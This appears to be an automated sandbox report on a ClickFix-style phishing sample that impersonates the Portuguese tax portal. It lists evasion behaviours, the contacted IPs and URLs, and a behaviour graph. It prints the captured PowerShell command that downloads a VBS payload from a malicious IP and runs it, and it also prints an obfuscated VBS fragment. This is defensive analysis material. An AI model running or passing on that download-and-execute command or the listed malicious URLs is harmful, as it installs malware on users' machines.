Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3653 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6009 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4364 Thread sleep count: 3653 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1356 Thread sleep count: 6009 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5500 Thread sleep time: -23980767295822402s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2528 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Uses threadpools to delay analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000010.00000002.1529584097.0000000007C1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: wscript.exe, 00000011.00000002.3234447526.0000000008009000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ~DE\fLMbhKvMCIWOScxNvDqgxxkmFHlRWAfGxsZMQzfxXPElIA
Source: wscript.exe, 00000011.00000002.3230015955.00000000029B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \dWsyAKhfOAkOgpVMCIgHcproquISJuYDcJHFQMzIaeLgbjOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Source: wscript.exe, 00000011.00000003.1531184674.0000000006D26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .fLMbhKvMCIWOScxNvDqgxxkmFHlRWAfGxsZMQzfxXPElIA\b
Source: 2539.vbs.16.dr Binary or memory string: fLMbhKvMCIWOScxNvDqgxxkmFHlRWAfGxsZMQzfxXPElIA = sHjGnny0(79) + sHjGnny0(97) + sHjGnny0(99) + sHjGnny0(80) + sHjGnny0(72) + sHjGnny0(84) + sHjGnny0(100) + sHjGnny0(114) + sHjGnny0(115) + sHjGnny0(75) + sHjGnny0(80) + sHjGnny0(103) + sHjGnny0(105) + sHjGnny0(69) + sHjGnny0(83) + sHjGnny0(84) + sHjGnny0(71) + sHjGnny0(77) + sHjGnny0(110) + sHjGnny0(89) + sHjGnny0(88) + sHjGnny0(77) + sHjGnny0(70) + sHjGnny0(110) + sHjGnny0(109) + sHjGnny0(71) + sHjGnny0(112) + sHjGnny0(111) + sHjGnny0(103) + sHjGnny0(82) + sHjGnny0(104) + sHjGnny0(110) + sHjGnny0(109) + sHjGnny0(80) + sHjGnny0(114) + sHjGnny0(110) + sHjGnny0(110) + sHjGnny0(102) + sHjGnny0(82) + sHjGnny0(122) + sHjGnny0(108) + sHjGnny0(81) + sHjGnny0(77) + sHjGnny0(102)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1696821 Sample: COMPROVATIVO-25643582-MAIO-... Startdate: 22/05/2025 Architecture: WINDOWS Score: 100 40 s3-r-w.us-east-2.amazonaws.com 2->40 42 ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com 2->42 50 Suricata IDS alerts for network traffic 2->50 52 Antivirus detection for URL or domain 2->52 54 Yara detected CAPTCHA Scam ClickFix 2->54 56 7 other signatures 2->56 8 cmd.exe 1 2->8         started        11 chrome.exe 2 2->11         started        14 chrome.exe 2->14         started        signatures3 process4 dnsIp5 58 Suspicious powershell command line found 8->58 16 powershell.exe 18 19 8->16         started        20 conhost.exe 8->20         started        44 192.168.2.6, 138, 443, 49692 unknown unknown 11->44 46 192.168.2.16 unknown unknown 11->46 48 2 other IPs or domains 11->48 60 Suspicious execution chain found 11->60 22 chrome.exe 11->22         started        signatures6 process7 dnsIp8 32 18.218.213.93, 49708, 80 AMAZON-02US United States 16->32 34 s3-r-w.us-east-2.amazonaws.com 16.12.65.210, 443, 49709 unknown United States 16->34 28 C:\Users\user\AppData\Local\Temp\2539.vbs, ASCII 16->28 dropped 24 wscript.exe 1 16->24         started        36 at-portaldasfinancas.org 195.54.163.111, 443, 49696, 49697 ITLASUA Ukraine 22->36 38 www.google.com 74.125.137.147, 443, 49692, 49714 GOOGLEUS United States 22->38 file9 process10 file11 30 C:\Users\user\AppData\Local\Temp\5767.vbs, Non-ISO 24->30 dropped 62 Potential malicious VBS script found (suspicious strings) 24->62 64 Windows Shell Script Host drops VBS files 24->64 66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 24->66 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
18.218.213.93
 unknown United States 16509 AMAZON-02US true
195.54.163.111
 at-portaldasfinancas.org Ukraine 15626 ITLASUA true
16.12.65.210
 s3-r-w.us-east-2.amazonaws.com United States unknown unknown false
74.125.137.147
 www.google.com United States 15169 GOOGLEUS false

Private

IP
192.168.2.7
192.168.2.16
192.168.2.6
192.168.2.5

Contacted Domains

Name IP Active
at-portaldasfinancas.org 195.54.163.111 true
www.google.com 74.125.137.147 true
s3-r-w.us-east-2.amazonaws.com 16.12.65.210 true
ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com/CMiEZso false
  • Avira URL Cloud: safe
 unknown
http://18.218.213.93/187.php true
  • Avira URL Cloud: malware
 unknown
http://c.pki.goog/r/r4.crl false
    		high
    https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php true
      		unknown
      file:///C:/Users/user/Desktop/COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD%20-%20211.html false
      • Avira URL Cloud: safe
      		 unknown